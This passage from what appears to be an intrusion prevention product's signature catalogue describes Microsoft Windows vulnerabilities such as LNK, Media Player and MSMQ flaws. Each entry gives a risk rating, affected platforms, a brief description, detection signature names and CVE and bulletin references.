
Situation:

File-Binary_Microsoft-Windows-Libarchive-Run_Filters-Heap-Buffer-Overflow

References:

CVE-2024-26256
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-26256

ms24-apr
http://technet.microsoft.com/security/bulletin/ms24-apr

Microsoft-Windows-License-Logging-Service-Buffer-Overflow-CVE-2005-0050

About this vulnerability:

Buffer overflow vulnerability in Microsoft Windows License Logging service

Risk:

High

First detected in:

sgpkg-ips-343-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows NT 4.0; Windows 2000; Windows 2003 SP0

Software:

<os>

Type:

Malfunction

Description:

The Microsoft Windows Server License Logging service contains a buffer overflow vulnerability caused by improper validation of the length of messages. A remote attacker could exploit this vulnerability to cause a denial of service and possibly to execute arbitrary code on the server.

Situation:

MSRPC-TCP_CPS-Microsoft-License-Logging-Service-Buffer-Overflow-CVE-2005-0050
MSRPC-TCP_CPS-Microsoft-License-Logging-Service-Buffer-Overflow-CVE-2005-0050-2

References:

CVE-2005-0050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0050

BID-12481
http://www.securityfocus.com/bid/12481

OSVDB-13599
http://www.osvdb.org/13599

MS05-010
http://technet.microsoft.com/security/bulletin/MS05-010

Microsoft-Windows-LNK-NTLM-Relay

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1752-5242

Last changed:

sgpkg-ips-1752-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

Improper handling of LNK files causes an NTLM relay vulnerability in Windows. A successful exploitation allows an attacker to authenticate to services as the target user.

Situation:

File-Binary_Microsoft-Windows-LNK-NTLM-Relay

References:

CVE-2024-30081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-30081

Microsoft-Windows-LNK-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1226-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a vulnerability in Microsoft Windows, multiple versions, which allows remote attackers to execute arbitrary code due to the insufficient handling of LNK files.

Situation:

File-Binary_Microsoft-Windows-LNK-Remote-Code-Execution

References:

CVE-2020-0729
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0729

Microsoft-Windows-LNK-Remote-Code-Execution-CVE-2020-1421

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1265-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Improper handling of LNK files causes a remote code execution in Windows.

Situation:

File-Binary_Microsoft-Windows-LNK-Remote-Code-Execution-CVE-2020-1421

References:

CVE-2020-1421
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1421

Microsoft-Windows-LSASS-Recursive-Stack-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-264-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000 Server; Windows 2003; Windows 2008; Windows XP

Software:

<os>

Type:

Malfunction

Description:

There is a stack overflow vulnerability in Microsoft Windows.

Situation:

Analyzer_Microsoft-Windows-LSASS-Recursive-Stack-Overflow
LDAP_CS-Microsoft-Windows-LSASS-Recursive-Stack-Overflow
LDAP_CS-MS09-066

References:

CVE-2009-1928
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1928

MS09-066
http://technet.microsoft.com/security/bulletin/MS09-066

Microsoft-Windows-Mail-Remote-Code-Execution-CVE-2011-2016

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-422-4219

Last changed:

sgpkg-ips-1638-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Windows involving the loading of a malicious DLL file while opening a legitimate EML or WCINV file

Situation:

HTTP_CSU-Microsoft-Windows-Address-Book-Insecure-Library-Loading-CVE-2010-3147
SMB-TCP_Microsoft-Windows-Wab32res.dll-Insecure-Library-Loading

References:

CVE-2011-2016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2016

MS11-085
http://technet.microsoft.com/security/bulletin/MS11-085

Microsoft-Windows-Mailslot-Heap-Overflow

About this vulnerability:

Heap buffer overflow vulnerability in the Server driver of Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-90-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows 2003

Software:

<os>

Type:

Buffer Overflow

Description:

There is a heap-based buffer overflow vulnerability in the Server driver of Microsoft Windows. A successful exploit against this vulnerability leads to a denial of service or arbitrary code execution with the privileges of the System kernel.

Situation:

SMB-TCP_CHS-First-Class-Mailslot-Traffic-Detected

References:

CVE-2006-1314
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1314

BID-18863
http://www.securityfocus.com/bid/18863

OSVDB-27154
http://www.osvdb.org/27154

MS06-035
http://technet.microsoft.com/security/bulletin/MS06-035

Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21189

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1824-5242

Last changed:

sgpkg-ips-1824-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A security feature bypass vulnerability exists in the MapUrlToZone API of Microsoft Windows.

Situation:

File-Text_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21189
File-Text_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21189-2
File-Binary_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21189

References:

CVE-2025-21189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21189

ms25-jan
http://technet.microsoft.com/security/bulletin/ms25-jan

Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21219

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1824-5242

Last changed:

sgpkg-ips-1824-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A security feature bypass vulnerability exists in the MapUrlToZone API of Microsoft Windows.

Situation:

File-Text_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21219
File-Text_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21219-2
File-Binary_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21219

References:

CVE-2025-21219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21219

ms25-jan
http://technet.microsoft.com/security/bulletin/ms25-jan

Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21268

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1824-5242

Last changed:

sgpkg-ips-1824-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A security feature bypass vulnerability exists in the MapUrlToZone API of Microsoft Windows.

Situation:

File-Text_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21268

References:

CVE-2025-21268
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21268

ms25-jan
http://technet.microsoft.com/security/bulletin/ms25-jan

Microsoft-Windows-Media-ASF-Header-Parsing-Invalid-Free

About this vulnerability:

A vulnerability in Windows Media Services

Risk:

Moderate

First detected in:

sgpkg-ips-581-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Windows Media Services

Type:

Directory Traversal

Description:

A remote code execution vulnerability exists in the way that Microsoft Windows handles specially crafted ASF format files. This vulnerability could allow remote code execution if a user opened a specially crafted file.

Situation:

File-Binary_Microsoft-Windows-Media-ASF-Header-Parsing-Invalid-Free

References:

CVE-2009-2498
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2498

MS09-047
http://technet.microsoft.com/security/bulletin/MS09-047

Microsoft-Windows-Media-Center-Insecure-Library-Loading

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-420-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An insecure library loading vulnerability has been reported in Microsoft Windows Media Center. The vulnerability is due to a design weakness exhibited while loading a DLL. A remote attacker could exploit this vulnerability by enticing a target user to open a file associated with Windows Media Center from an SMB or WebDAV share. A successful attack could result in the execution of arbitrary code in security context of the target user.

Situation:

HTTP_CSU-Microsoft-Windows-Media-Center-Insecure-Library-Loading
SMB-TCP_CHS-Microsoft-Windows-Media-Center-Insecure-Library-Loading

References:

CVE-2011-2009
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2009

OSVDB-76205
http://www.osvdb.org/76205

MS11-076
http://technet.microsoft.com/security/bulletin/MS11-076

Microsoft-Windows-Media-Center-MCL-File-Code-Execution

About this vulnerability:

A vulnerability in Windows Media Center

Risk:

High

First detected in:

sgpkg-ips-679-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows 7; Windows 8

Software:

<os>

Type:

Input Validation

Description:

There is a remote code execution vulnerability in Microsoft's Windows Media Center related to handling MCL files.

Situation:

SMB-TCP_Microsoft-Windows-Media-Center-MCL-File-Code-Execution
File-Text_Microsoft-Windows-Media-Center-MCL-File-Code-Execution

References:

CVE-2015-2509
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2509

MS15-100
http://technet.microsoft.com/security/bulletin/MS15-100

Microsoft-Windows-Media-CVE-2016-0101-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-973-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a code execution vulnerability in Microsoft Windows Media. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Binary_Microsoft-Windows-Media-CVE-2016-0101-Code-Execution

References:

CVE-2016-0101
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0101

MS16-027
http://technet.microsoft.com/security/bulletin/MS16-027

Microsoft-Windows-Media-Device-Manager-Insecure-Library-Loading

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-663-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 7; Windows Vista; Windows 2003; Windows 2008; Windows 2008 R2

Software:

<os>

Type:

Malfunction

Description:

An insecure library loading vulnerability exists in Microsoft Windows Media Device Manager. The vulnerability is due to the way that the affected component handles the loading of dynamically-linked library (.dll) files. A remote attacker could exploit this vulnerability by enticing a target user to open an Office file from an SMB or WebDAV share. A successful attack could result in the execution of arbitrary code in the security context of the target user.

Situation:

File-OLE_Microsoft-Windows-Media-Device-Manager-Insecure-Library-Loading
File-RTF_Microsoft-Windows-Media-Device-Manager-Insecure-Library-Loading

References:

CVE-2015-2369
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2369

MS15-069
http://technet.microsoft.com/security/bulletin/MS15-069

Microsoft-Windows-Media-Encoder-9-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows Media Encoder 9

Risk:

High

First detected in:

sgpkg-ips-167-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Windows Media Encoder

Type:

Buffer Overflow

Description:

There is a stack buffer overflow in Microsoft Windows Media Encoder. The vulnerability is due to a boundary error while handling an overly large parameter passed to a function exposed by an ActiveX control in the WMEX.DLL library. A remote attacker can exploit the vulnerability by enticing the target user to visit a malicious web page. Successful exploitation causes a stack-based buffer overflow that may lead to arbitrary code execution in the security context of the logged in user.

Situation:

HTTP_SS-Microsoft-Windows-Media-Encoder-9-ActiveX-Control-Buffer-Overflow
File-Text_Microsoft-Windows-Media-Encoder-9-ActiveX-Control-Buffer-Overflow

References:

CVE-2008-3008
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3008

BID-31065
http://www.securityfocus.com/bid/31065

MS08-053
http://technet.microsoft.com/security/bulletin/MS08-053

Microsoft-Windows-Media-Encoder-Insecure-Library-Loading-CVE-2010-3965

About this vulnerability:

A vulnerability in Microsoft Windows Media Encoder

Risk:

High

First detected in:

sgpkg-ips-362-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows XP; Windows 2008

Software:

Microsoft Windows Media Encoder

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Windows Media Encoder.

Situation:

HTTP_CSU-Microsoft-Windows-Media-Encoder-Insecure-Library-Loading-CVE-2010-3965

References:

CVE-2010-3965
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3965

BID-42855
http://www.securityfocus.com/bid/42855

MS10-094
http://technet.microsoft.com/security/bulletin/MS10-094

Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows Media Format Runtime

Risk:

High

First detected in:

sgpkg-ips-136-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Windows Media Format Runtime; Windows Media Format Runtime x64 Edition; Windows Media Services

Type:

Buffer Overflow

Description:

There are multiple buffer overflow vulnerabilities in the Microsoft Windows Media Format processing engine. These vulnerabilities are caused by a boundary error when processing Advanced Systems Format (ASF) files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted ASF file, potentially causing arbitrary code to be injected and executed in the security context of the currently logged in user.

Situation:

HTTP_SS-Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-JPEG
HTTP_SS-Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-Sum
HTTP_SS-Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-Spread
HTTP_SS-Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-Sig
File-Binary_Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-JPEG
File-Binary_Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-Sum
File-Binary_Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-Spread
File-Binary_Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-Sig

References:

CVE-2007-0064
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0064

BID-26776
http://www.securityfocus.com/bid/26776

MS07-068
http://technet.microsoft.com/security/bulletin/MS07-068

Microsoft-Windows-Media-Foundation-Memory-Corruption-CVE-2020-16915

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Critical

First detected in:

sgpkg-ips-1287-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A memory corruption vulnerability exists in Windows Media Foundation. A successful exploitation of this vulnerability can enable the attacker to install programs, access data and create new users on the target machine.

Situation:

File-MPEG_Microsoft-Windows-Media-Foundation-Memory-Corruption-CVE-2020-16915

References:

CVE-2020-16915
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16915

ms20-oct
http://technet.microsoft.com/security/bulletin/ms20-oct

Microsoft-Windows-Media-Foundation-Mfasfsrcsnk.dll-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1364-5242

Last changed:

sgpkg-ips-1364-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A memory corruption vulnerability has been reported in Windows Media Foundation. The vulnerability is due to improper handling of objects in memory. A remote attacker could exploit this vulnerability by enticing an user to open a maliciously crafted file or web page. Successful exploitation could result in arbitrary code execution with user privileges.

Situation:

File-Binary_Microsoft-Windows-Media-Foundation-Mfasfsrcsnk.dll-Type-Confusion

References:

CVE-2020-0738
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0738

Microsoft-Windows-Media-MIDI-File-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-973-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in the Microsoft Windows Multimedia library. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Binary_Microsoft-Windows-Media-MIDI-File-Memory-Corruption

References:

CVE-2012-0003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0003

BID-51292
http://www.securityfocus.com/bid/51292

MS12-004
http://technet.microsoft.com/security/bulletin/MS12-004

Microsoft-Windows-Media-Playback-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Windows Media Format Runtime

Risk:

Moderate

First detected in:

sgpkg-ips-401-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A memory corruption vulnerability exists in the MP3 parser of Microsoft Windows Media Format. The vulnerability is due to the way that Microsoft Windows handles MP3 media files. A remote attacker can exploit this vulnerability by enticing the target to open a malicious mp3 file. In the case of successful code injection and execution, the behaviour of the target is dependent on the intention of the malicious code. The injected code will be executed with the privileges of the currently user. In the case where code execution is not successful, the application using the vulnerable component may terminate abnormally.

Situation:

HTTP_SS-Microsoft-Windows-Media-Playback-Memory-Corruption
File-Binary_Microsoft-Windows-Media-Playback-Memory-Corruption

References:

CVE-2009-2499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2499

BID-36228
http://www.securityfocus.com/bid/36228

MS09-047
http://technet.microsoft.com/security/bulletin/MS09-047

Microsoft-Windows-Media-Player-Code-Execution-MS09-052

About this vulnerability:

A parsing vulnerability in Windows Media Player

Risk:

High

First detected in:

sgpkg-ips-257-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Windows Media Player

Type:

Buffer Overflow

Description:

A vulnerability related to ASF file parsing in certain versions of Windows Media Player allows remote attackers to execute arbitrary code on vulnerably systems.

Situation:

E-Mail_BS-Windows-Media-Player-ASF-CVE-2009-2527
HTTP_SS-Windows-Media-Player-ASF-CVE-2009-2527
File-Binary_Windows-Media-Player-ASF-CVE-2009-2527

References:

CVE-2009-2527
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2527

MS09-052
http://technet.microsoft.com/security/bulletin/MS09-052

Microsoft-Windows-Media-Player-DVR-MS-Memory-Corruption

About this vulnerability:

An attempt to exploit a vulnerability in Windows Media Player detected

Risk:

Moderate

First detected in:

sgpkg-ips-428-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Windows Media Player

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Windows Media Player detected

Situation:

File-Binary_Windows-Media-Player-DVR-MS-Memory-Corruption

References:

CVE-2011-3401
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3401

MS11-092
http://technet.microsoft.com/security/bulletin/MS11-092

Microsoft-Windows-Media-Player-File-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Windows Media Player

Risk:

Low

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Windows Media Player

Type:

Malfunction

Description:

There exists a vulnerability in Microsoft Windows Media Player. A remote attacker can use this to access sensitive information.

Situation:

File-Text_Microsoft-Windows-Media-Player-File-Information-Disclosure

References:

CVE-2004-1325
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1325

BID-12032
http://www.securityfocus.com/bid/12032

Microsoft-Windows-Media-Player-Media-Library-Manipulation

About this vulnerability:	A vulnerability in Windows Media Player
Risk:	High
First detected in:	sgpkg-ips-410-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Windows Media Player
Type:	Malfunction
Description:	A vulnerability exists in the way the Microsoft Windows Media Player ActiveX Control accesses local multimedia files. A script embedded in an HTML page could use the ActiveX control to disclose or update information in the media library database. This vulnerability may be remotely leveraged by an attacker to obtain information on local multimedia files.
Situation:	File-Text_Microsoft-Windows-Media-Player-Media-Library-Manipulation

Microsoft-Windows-Media-Player-PNG-Image-Parsing-Buffer-Overflow

About this vulnerability:

PNG image parsing buffer overflow in Microsoft Windows Media Player

Risk:

High

First detected in:

sgpkg-ips-69-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows 2003

Software:

Windows Media Player

Type:

Buffer Overflow

Description:

Microsoft Windows Media Player has a vulnerability in the processing of the ancillary chunks in PNG images. The program does not check the size of the chunk data before the data is copied into a fixed size buffer. A remote attacker is able to exploit this vulnerability to execute arbitrary code on the victim machine.

Situation:

HTTP_PNG-Image-With-Large-Data-Length-Value
E-Mail_BS-PNG-Image-With-Large-Data-Length-Value
File-PNG_PNG-Image-With-Large-Data-Length-Value

References:

CVE-2006-0025
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0025

BID-18385
http://www.securityfocus.com/bid/18385

OSVDB-26430
http://www.osvdb.org/26430

MS06-024
http://technet.microsoft.com/security/bulletin/MS06-024

Microsoft-Windows-Media-Player-Skin-Parsing-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows Media Player

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Microsoft Windows Media Player. The vulnerability is due to insufficient data validation while parsing compressed skin files. A remote attacker can exploit this flaw by enticing the target user to open a crafted WMZ file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In a simple attack case, the affected Windows Media Player may terminate when the malicious file is opened. In a sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature of the injected code. Any code injected into the vulnerable component would execute in the security context of the currently logged in user.

Situation:

File-Zip_Microsoft-Windows-Media-Player-Skin-Parsing-Code-Execution

References:

CVE-2007-3037
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3037

BID-25305
http://www.securityfocus.com/bid/25305

OSVDB-36385
http://www.osvdb.org/36385

MS07-047
http://technet.microsoft.com/security/bulletin/MS07-047

Microsoft-Windows-Message-Queuing-Service-DoS-CVE-2023-21769

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1646-5242

Last changed:

sgpkg-ips-1646-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A denial of service vulnerability has been reported for the Message Queuing Service in Microsoft Windows. The vulnerability is due to improper handling of incoming MSMQ packets. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted MSMQ packet to a MSMQ server. Successful exploitation of this vulnerability can result in the crash of the target service.

Situation:

Generic_CS-Microsoft-Windows-Message-Queuing-Service-DoS-CVE-2023-21769

References:

CVE-2023-21769
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21769

Microsoft-Windows-Message-Queuing-Service-DoS-CVE-2023-28302

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1646-5242

Last changed:

sgpkg-ips-1646-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A denial of service vulnerability has been reported for Message Queuing Service in Microsoft Windows. The vulnerability is due to improper handling of the incoming MSMQ packets. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted MSMQ packet to a MSMQ server. Successful exploitation of this vulnerability can result in the denial of service on the target system.

Situation:

Generic_CS-Microsoft-Windows-Message-Queuing-Service-DoS-CVE-2023-28302

References:

CVE-2023-28302
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28302

Microsoft-Windows-Message-Queuing-Service-SRMP-DoS-CVE-2023-36606

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1646-5242

Last changed:

sgpkg-ips-1646-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A denial-of-service vulnerability has been reported in Microsoft Windows Message Queuing Service. The vulnerability is due to improper handling of the incoming MSMQ traffic. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted packet to a MSMQ server. Successful exploitation could result in the denial of service on the target machine.

Situation:

IPv4_Microsoft-Windows-Message-Queuing-Service-SRMP-DoS-CVE-2023-36606
File-TextId_Microsoft-Windows-Message-Queuing-Service-SRMP-DoS-CVE-2023-36606

References:

CVE-2023-36606
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36606

Microsoft-Windows-Messenger-ActiveX-Control-CVE-2011-1243

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-386-4219

Last changed:

sgpkg-ips-1341-5242

Platform:

Windows XP

Software:

Microsoft Messenger

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Messenger.

Situation:

HTTP_SS-Microsoft-Windows-Messenger-ActiveX-Control-CVE-2011-1243

References:

CVE-2011-1243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1243

BID-47197
http://www.securityfocus.com/bid/47197

OSVDB-71788
http://www.osvdb.org/71788

MS11-027
http://technet.microsoft.com/security/bulletin/MS11-027

Microsoft-Windows-Messenger-ActiveX-Information-Disclosure

About this vulnerability:

A vulnerability in Windows Messenger

Risk:

High

First detected in:

sgpkg-ips-584-5211

Last changed:

sgpkg-ips-1341-5242

Platform:

Windows

Software:

Windows Messenger

Type:

Input Validation

Description:

There is an information disclosure vulnearbility in the "Messenger.UIAutomation.1" ActiveX control of Windows Messenger.

References:

CVE-2008-0082
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0082

BID-30551
http://www.securityfocus.com/bid/30551

MS08-050
http://technet.microsoft.com/security/bulletin/MS08-050

Microsoft-Windows-Metafile-Setpalette-Entries-Heap-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-973-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a heap overflow vulnerability in the Metafile (WMF) rendering component of Microsoft Windows. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Binary_Microsoft-Windows-Metafile-Setpalette-Entries-Heap-Overflow

References:

CVE-2005-2124
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2124

BID-15356
http://www.securityfocus.com/bid/15356

Microsoft-Windows-MF3216-Component-Heap-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows MF3216 Component

Risk:

High

First detected in:

sgpkg-ips-1206-5242

Last changed:

sgpkg-ips-1684-5242

Platform:

Windows

Software:

Microsoft Windows MF3216

Type:

Buffer Overflow

Description:

There exists a vulnerability in MF3216 component of Microsoft Windows, multiple versions, which allows remote attackers to execute arbitrary code by enticing a user to open a specially crafted file.

Situation:

File-Binary_Microsoft-Windows-MF3216-Component-Heap-Based-Buffer-Overflow
File-RTF_Microsoft-Windows-MF3216-Component-Heap-Based-Buffer-Overflow

References:

CVE-2019-1439
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1439

Microsoft-Windows-MFC-Document-Title-Updating-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-740-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

PowerZip

Type:

Buffer Overflow

Description:

There exists a stack buffer overflow vulnerability in Microsoft Windows MFC library mfc42.dll. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Zip_Microsoft-Windows-MFC-Document-Title-Updating-Buffer-Overflow

References:

CVE-2010-3227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3227

BID-41333
http://www.securityfocus.com/bid/41333

MS10-074
http://technet.microsoft.com/security/bulletin/MS10-074

Microsoft-Windows-MFC-Library-FileFind-Class-Heap-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows' Microsoft Foundation Classes shared library

Risk:

High

First detected in:

sgpkg-ips-123-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows 2003

Software:

Microsoft Visual Studio; Microsoft Visual Studio .NET; Microsoft Visual Studio 2005; HP All-in-One Series; HP Photo & Imaging Gallery

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft Foundation Classes (MFC) shared library. The flaw resides in the FileFind Class. It could be exposed remotely via applications that use the FileFind class and pass user provided data to the affected function.

Situation:

HTTP_SS-HP-HpqUtil-ActiveX-Component-ListFiles-Method-Buffer-Overflow
File-Text_HP-HpqUtil-ActiveX-Component-ListFiles-Method-Buffer-Overflow

References:

CVE-2007-4916
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4916

BID-25697
http://www.securityfocus.com/bid/25697

Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-375-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows XP; Windows 2003; Windows 2008; Windows 7; Windows 2008 R2

Software:

<os>

Type:

Cross-site Scripting

Description:

There is a vulnerability in Microsoft Windows.

Situation:

HTTP_SHS-Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096-3
HTTP_SS-Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096
HTTP_SS-Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096-2
File-Text_Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096-2
File-Text_Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096

References:

CVE-2011-0096
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0096

BID-46055
http://www.securityfocus.com/bid/46055

OSVDB-70693
http://www.osvdb.org/70693

MS11-026
http://technet.microsoft.com/security/bulletin/MS11-026

